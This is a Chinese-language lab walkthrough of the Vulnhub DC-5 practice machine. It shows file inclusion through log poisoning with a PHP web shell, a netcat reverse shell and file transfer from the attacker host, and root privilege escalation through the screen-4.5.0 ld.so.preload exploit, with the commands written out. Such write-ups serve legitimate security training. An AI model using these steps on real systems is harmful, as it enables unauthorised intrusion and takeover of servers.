靶机渗透-Vulnhub-DC-5

下载地址：

1、链接：链接：https://pan.baidu.com/s/18oWwdCW6jWnv_8TOL0wd4g

提取码：db4a

2、http://www.five86.com/downloads/DC-5.zip

3、https://download.vulnhub.com/dc/DC-5.zip

靶机：DC5（VMware桥接）   IP：192.168.88.103

攻击机：Kali（VMware桥接）  IP：192.168..88.109

1、确认目标后利用nmap扫描，查看系统开放的端口和运行的服务，开放了80和111端口

2、直接访问80端口，服务器是nginx，php开发语言

3、只有在contact这个页面中有交互的地方

4、提交几次后发现，当信息提交后，连续刷新thankyou.php页面，“Copyright © 2018“中的数字会发生变化，2017-2020之间。

5、利用工具扫描一下敏感文件和目录，发现有一个footer.php文件

6、访问后发现页面内容就是提交后下方显示的时间，那么thankyou.php文件应该包含了footer.php文件，thankyou.php可能存在文件包含漏洞。(以下ip改为137)

7、在contanct.php页面中填写并提交表单后进行抓包，然后重复发包，查看变化

8、利用file命令读取一下文件，参数常用的也是file，也可用burp进行参数遍历

   读取/etc/passwd文件，确认存在文件包含漏洞。

9、查看nginx配置文件，找到nginx日志记录文件路径

    #nginx日志文件路径

    /var/log/nginx/error.log

    /var/log/nginx/access.log

10、利用burp把file参数值改为一句话木马

file=<?php system($_GET[‘test’]); ?>

11、包含nginx的错误日志，利用一句话木马

12、利用文件包含一句话反弹shell

       现在kali上设置监听  nc -lvvp 8888

13、使用一句话来反弹

反弹成功

14、切换为交互式shell

15、查找具有SUID权限的文件

  （1）find / -user root -perm -4000 -print 2>/dev/null

（2）find / -perm -u=s -type f 2>/dev/null

利用screen-4.5.0提权

16、利用searchsploit查询漏洞利用的脚本

17、将这个脚本复制出来，查看脚本的使用

   大概步骤是分别将两部分的c代码编译为可执行文件，然后将其上传的靶机，按照提示的命令进行提权

第一步

​将第一部分的c代码放入libhax.c文件中进行编译

命令：gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c

第二步

​将第二部分c代码放入rootshell.c文件中进行编译

命令：gcc -o /tmp/rootshell /tmp/rootshell.c

第三步

将编译好的可执行文件上传到靶机的tmp目录下

第四步

按照脚本提示的命令进行提权

18、分别复制两段代码，在kali中输入，创建libhax.c和rootshell.c文件

19、使用命令编译c文件

命令：gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c

命令：gcc -o /tmp/rootshell /tmp/rootshell.c

20、通过nc将文件传输到目标机的tmp文件夹（kali和靶机都是在tmp目录下进行操作，因为tmp目录的权限较大）

kali:（kali的终端连接之后再断开，在靶机的shell里面可以查看上传成功）

nc -nlvp 8888 < libhax.so

nc -nlvp 8888 < rootshell

目标机：

nc 192.168.88.109（kali的ip）8888 > libhax.so

nc 192.168.88.109（kali的ip）8888 > rootshell

21、根据提权说明进行提权

cd /etc

umask 000

screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so"

screen -ls

/tmp/rootshell

提权成功

flag在root目录下